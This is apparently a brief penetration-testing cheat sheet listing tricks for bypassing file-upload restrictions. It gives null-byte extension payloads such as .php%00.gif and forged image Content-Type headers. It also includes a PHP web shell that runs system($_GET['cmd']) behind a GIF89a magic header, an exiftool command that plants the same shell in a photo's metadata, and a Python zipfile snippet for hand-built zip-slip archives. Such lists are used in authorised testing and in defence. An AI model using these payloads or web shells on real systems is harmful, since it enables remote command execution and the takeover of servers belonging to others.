Tricks

Null Byte

• .php%00.gif

• .php\x00.gif

• .php%00.png

• .php\x00.png

• .php%00.jpg

• .php\x00.jpg

Mime type

• Content-Type : image/gif

• Content-Type : image/png

• Content-Type : image/jpeg

GIF89a;

GIF89a;
<?
system($_GET['cmd']);
?>

Inside image's content

exiftool -Comment='<?php system($_GET['cmd']); ?>' photo.jpg

Create ZIP manually (e.g: zipslip)

Using zipfile

from zipfile import ZipFile

zip = ZipFile("test.zip", "w")
zip.writestr("path", "content")

zip.close()